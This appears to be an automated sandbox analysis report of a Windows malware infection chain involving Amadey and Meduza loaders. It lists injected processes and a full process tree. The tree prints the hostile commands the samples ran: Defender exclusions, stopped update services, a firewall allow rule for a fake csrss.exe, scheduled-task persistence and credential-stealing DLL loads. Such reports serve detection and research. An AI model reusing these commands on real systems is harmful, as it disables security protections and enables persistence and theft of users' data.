description pid Process Token: SeDebugPrivilege 5000 vbc.exe Token: SeDebugPrivilege 2796 vbc.exe Token: SeDebugPrivilege 4132 vbc.exe Token: SeDebugPrivilege 4048 conhost.exe Token: SeDebugPrivilege 3924 taskhost.exe Token: SeDebugPrivilege 5112 taskhost.exe Token: SeDebugPrivilege 4912 taskhost.exe Token: SeDebugPrivilege 4704 schtasks.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeDebugPrivilege 2896 powercfg.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4116 powershell.exe Token: SeSecurityPrivilege 4116 powershell.exe Token: SeTakeOwnershipPrivilege 4116 powershell.exe Token: SeLoadDriverPrivilege 4116 powershell.exe Token: SeSystemProfilePrivilege 4116 powershell.exe Token: SeSystemtimePrivilege 4116 powershell.exe Token: SeProfSingleProcessPrivilege 4116 powershell.exe Token: SeIncBasePriorityPrivilege 4116 powershell.exe Token: SeCreatePagefilePrivilege 4116 powershell.exe Token: SeBackupPrivilege 4116 powershell.exe Token: SeRestorePrivilege 4116 powershell.exe Token: SeShutdownPrivilege 4116 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeSystemEnvironmentPrivilege 4116 powershell.exe Token: SeRemoteShutdownPrivilege 4116 powershell.exe Token: SeUndockPrivilege 4116 powershell.exe Token: SeManageVolumePrivilege 4116 powershell.exe Token: 33 4116 powershell.exe Token: 34 4116 powershell.exe Token: 35 4116 powershell.exe Token: 36 4116 powershell.exe Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4892 powershell.exe Token: SeSecurityPrivilege 4892 powershell.exe Token: SeTakeOwnershipPrivilege 4892 powershell.exe Token: SeLoadDriverPrivilege 4892 powershell.exe Token: SeSystemProfilePrivilege 4892 powershell.exe Token: SeSystemtimePrivilege 4892 powershell.exe Token: SeProfSingleProcessPrivilege 4892 powershell.exe Token: SeIncBasePriorityPrivilege 4892 powershell.exe Token: SeCreatePagefilePrivilege 4892 powershell.exe Token: SeBackupPrivilege 4892 powershell.exe Token: SeRestorePrivilege 4892 powershell.exe Token: SeShutdownPrivilege 4892 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeSystemEnvironmentPrivilege 4892 powershell.exe Token: SeRemoteShutdownPrivilege 4892 powershell.exe Token: SeUndockPrivilege 4892 powershell.exe Token: SeManageVolumePrivilege 4892 powershell.exe Token: 33 4892 powershell.exe Token: 34 4892 powershell.exe Token: 35 4892 powershell.exe Token: 36 4892 powershell.exe Token: SeShutdownPrivilege 3204 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3152 wrote to memory of 4688 3152 u8542029.exe 70 PID 3152 wrote to memory of 4688 3152 u8542029.exe 70 PID 3152 wrote to memory of 4688 3152 u8542029.exe 70 PID 4688 wrote to memory of 2144 4688 legosa.exe 71 PID 4688 wrote to memory of 2144 4688 legosa.exe 71 PID 4688 wrote to memory of 2144 4688 legosa.exe 71 PID 4688 wrote to memory of 4756 4688 legosa.exe 73 PID 4688 wrote to memory of 4756 4688 legosa.exe 73 PID 4688 wrote to memory of 4756 4688 legosa.exe 73 PID 4756 wrote to memory of 3752 4756 cmd.exe 75 PID 4756 wrote to memory of 3752 4756 cmd.exe 75 PID 4756 wrote to memory of 3752 4756 cmd.exe 75 PID 4756 wrote to memory of 5080 4756 cmd.exe 76 PID 4756 wrote to memory of 5080 4756 cmd.exe 76 PID 4756 wrote to memory of 5080 4756 cmd.exe 76 PID 4756 wrote to memory of 3196 4756 cmd.exe 77 PID 4756 wrote to memory of 3196 4756 cmd.exe 77 PID 4756 wrote to memory of 3196 4756 cmd.exe 77 PID 4756 wrote to memory of 3696 4756 cmd.exe 78 PID 4756 wrote to memory of 3696 4756 cmd.exe 78 PID 4756 wrote to memory of 3696 4756 cmd.exe 78 PID 4756 wrote to memory of 4524 4756 cmd.exe 79 PID 4756 wrote to memory of 4524 4756 cmd.exe 79 PID 4756 wrote to memory of 4524 4756 cmd.exe 79 PID 4756 wrote to memory of 2236 4756 cmd.exe 80 PID 4756 wrote to memory of 2236 4756 cmd.exe 80 PID 4756 wrote to memory of 2236 4756 cmd.exe 80 PID 4688 wrote to memory of 2784 4688 legosa.exe 81 PID 4688 wrote to memory of 2784 4688 legosa.exe 81 PID 4688 wrote to memory of 2784 4688 legosa.exe 81 PID 2784 wrote to memory of 5000 2784 10c7b9izmah9.exe 82 PID 2784 wrote to memory of 5000 2784 10c7b9izmah9.exe 82 PID 2784 wrote to memory of 5000 2784 10c7b9izmah9.exe 82 PID 2784 wrote to memory of 5000 2784 10c7b9izmah9.exe 82 PID 4688 wrote to memory of 4496 4688 legosa.exe 83 PID 4688 wrote to memory of 4496 4688 legosa.exe 83 PID 4688 wrote to memory of 4496 4688 legosa.exe 83 PID 2784 wrote to memory of 5000 2784 10c7b9izmah9.exe 82 PID 4496 wrote to memory of 2796 4496 pf3bv0f2aw4mj.exe 84 PID 4496 wrote to memory of 2796 4496 pf3bv0f2aw4mj.exe 84 PID 4496 wrote to memory of 2796 4496 pf3bv0f2aw4mj.exe 84 PID 4496 wrote to memory of 2796 4496 pf3bv0f2aw4mj.exe 84 PID 4496 wrote to memory of 2796 4496 pf3bv0f2aw4mj.exe 84 PID 4688 wrote to memory of 4504 4688 legosa.exe 85 PID 4688 wrote to memory of 4504 4688 legosa.exe 85 PID 4688 wrote to memory of 4504 4688 legosa.exe 85 PID 4504 wrote to memory of 4132 4504 useyyoou_crypted.exe 86 PID 4504 wrote to memory of 4132 4504 useyyoou_crypted.exe 86 PID 4504 wrote to memory of 4132 4504 useyyoou_crypted.exe 86 PID 4504 wrote to memory of 4132 4504 useyyoou_crypted.exe 86 PID 4504 wrote to memory of 4132 4504 useyyoou_crypted.exe 86 PID 4688 wrote to memory of 3648 4688 legosa.exe 87 PID 4688 wrote to memory of 3648 4688 legosa.exe 87 PID 4688 wrote to memory of 3648 4688 legosa.exe 87 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 3648 wrote to memory of 4516 3648 crypted158.exe 90 PID 4688 wrote to memory of 4484 4688 legosa.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\u8542029.exe"C:\Users\Admin\AppData\Local\Temp\u8542029.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe"C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legosa.exe /TR "C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe" /F4⤵
- Creates scheduled task(s)
PID:2144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legosa.exe" /P "Admin:N"&&CACLS "legosa.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ebb444342c" /P "Admin:N"&&CACLS "..\ebb444342c" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3752
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legosa.exe" /P "Admin:N"5⤵PID:5080
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legosa.exe" /P "Admin:R" /E5⤵PID:3196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3696
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\ebb444342c" /P "Admin:N"5⤵PID:4524
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\ebb444342c" /P "Admin:R" /E5⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe"C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe"C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe"C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 3085⤵
- Program crash
PID:664
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe"C:\Users\Admin\AppData\Local\Temp\1000159001\rockas.exe"4⤵
- Executes dropped EXE
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"5⤵
- Executes dropped EXE
PID:2300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit6⤵PID:3844
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:3928
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"7⤵PID:204
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E7⤵PID:364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
- Executes dropped EXE
PID:2812
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"7⤵
- Executes dropped EXE
PID:4220
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E7⤵PID:3236
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F6⤵
- Creates scheduled task(s)
PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\1000438001\ss41.exe"C:\Users\Admin\AppData\Local\Temp\1000438001\ss41.exe"6⤵
- Executes dropped EXE
PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"6⤵PID:4048
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4944 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4408
-
-
C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000439001\toolspub2.exe"7⤵PID:4892
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3924 -
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"7⤵PID:4704
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2236
-
-
C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"6⤵
- Executes dropped EXE
PID:3200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\1000440001\31839b57a4f11171d6abc8bbc4451ee4.exe"7⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4440 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:192
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"8⤵PID:5916
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes9⤵
- Modifies Windows Firewall
PID:4060
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3240
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe8⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5392
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F9⤵
- Creates scheduled task(s)
PID:5344
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2144
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f9⤵PID:4108
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll9⤵
- Executes dropped EXE
PID:5296
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F9⤵
- Creates scheduled task(s)
PID:4396
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"9⤵
- Executes dropped EXE
PID:4196 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵PID:1132
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"7⤵PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"7⤵PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe"C:\Users\Admin\AppData\Local\Temp\1000167001\rockas.exe"4⤵PID:4220
-
-
C:\Users\Admin\AppData\Local\Temp\1000172001\Amadey.exe"C:\Users\Admin\AppData\Local\Temp\1000172001\Amadey.exe"4⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe"C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe"5⤵
- Executes dropped EXE
PID:5028 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe" /F6⤵
- Creates scheduled task(s)
PID:744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8bff37b77" /P "Admin:N"&&CACLS "..\e8bff37b77" /P "Admin:R" /E&&Exit6⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:744
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "yiueea.exe" /P "Admin:N"7⤵PID:4136
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "yiueea.exe" /P "Admin:R" /E7⤵PID:192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:1984
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\e8bff37b77" /P "Admin:N"7⤵PID:3960
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\e8bff37b77" /P "Admin:R" /E7⤵PID:3960
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main6⤵
- Loads dropped DLL
PID:5640 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main7⤵
- Loads dropped DLL
PID:5684 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5684 -s 5968⤵
- Program crash
PID:5560
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main6⤵
- Loads dropped DLL
PID:5720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000173001\Meduza.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\Meduza.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3968
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main4⤵
- Loads dropped DLL
PID:2920
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:5372
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5264
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:6068
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5248
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5236
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5416
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4328
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3440
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:5244
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3616
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4140
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3696
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5496
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1800
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:5884
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5208
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2224
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Executes dropped EXE
PID:5080
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4588
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:5536
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:6060
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5360
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4248
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5728
-
-
-
